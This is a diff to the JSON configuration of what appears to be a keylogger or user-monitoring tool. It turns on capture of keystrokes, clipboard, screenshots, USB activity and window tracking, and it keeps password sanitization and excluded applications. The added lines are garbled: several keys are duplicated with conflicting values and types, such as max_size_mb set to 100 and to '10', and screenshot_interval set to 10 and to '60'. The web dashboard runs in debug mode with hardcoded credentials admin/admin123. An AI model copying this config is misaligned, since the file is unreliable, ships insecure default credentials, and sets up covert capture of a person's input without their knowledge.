--- a/config.json
+++ b/config.json
@@ -2,12 +2,15 @@
   "logging": {
     "level": "INFO",
     "file_path": "logs/keylog.txt",
-    "max_size_mb": 100,
+    "max_file_size_mb": 100,
+    "backup_count": 5,
     "buffer_size": 100,
+    "flush_interval_seconds": 10,
+    "max_size_mb": "10",
     "flush_interval": 5.0,
     "enable_rotation": true,
     "enable_encryption": true,
-    "backup_count": 5
+    "file": "keylogger.log"
   },
   "encryption": {
     "enabled": false,
@@ -15,19 +18,26 @@
     "algorithm": "AES-256-GCM"
   },
   "features": {
+    "key_logging": true,
+    "mouse_logging": "on",
+    "clipboard_logging": true,
+    "screenshots": true,
+    "usb_monitoring": true,
+    "network_logging": false,
+    "window_tracking": true,
     "keyboard": true,
     "mouse": true,
     "clipboard": true,
-    "screenshots": true,
-    "usb_monitoring": true,
     "network_monitoring": false,
-    "window_tracking": true,
-    "performance_monitoring": true
+    "performance_monitoring": true,
+    "keyboard_logging": "on",
+    "clipboard_monitoring": "on",
+    "screenshot_monitoring": "on"
   },
   "privacy": {
     "sanitize_passwords": true,
     "hash_sensitive_data": true,
-    "clipboard_max_length": 1000,
+    "max_clipboard_length": 1000,
     "excluded_applications": [
       "password_manager.exe",
       "keepass.exe",
@@ -45,14 +55,20 @@
       "cvv",
       "pin",
       "secret"
-    ]
+    ],
+    "clipboard_max_length": 1000
   },
   "performance": {
-    "screenshot_interval": 10,
+    "screenshot_interval_seconds": 30,
+    "window_check_interval_seconds": 5,
+    "clipboard_check_interval_seconds": 3,
+    "max_memory_usage_mb": 500,
+    "thread_pool_size": 4,
+    "screenshot_interval": "60",
     "window_check_interval": 1.0,
     "clipboard_check_interval": 0.5,
-    "max_memory_usage_mb": 500,
-    "thread_pool_size": 4
+    "buffer_size": "1000",
+    "flush_interval": "30"
   },
   "remote": {
     "enabled": false,
@@ -80,10 +96,11 @@
   "web": {
     "enabled": true,
     "host": "127.0.0.1",
-    "port": 5000,
+    "port": "5000",
     "debug": true,
     "username": "admin",
     "password": "admin123",
-    "secret_key": "your-secret-key-here"
+    "secret_key": "your-secret-key-here",
+    "auth_enabled": "on"
   }
 }
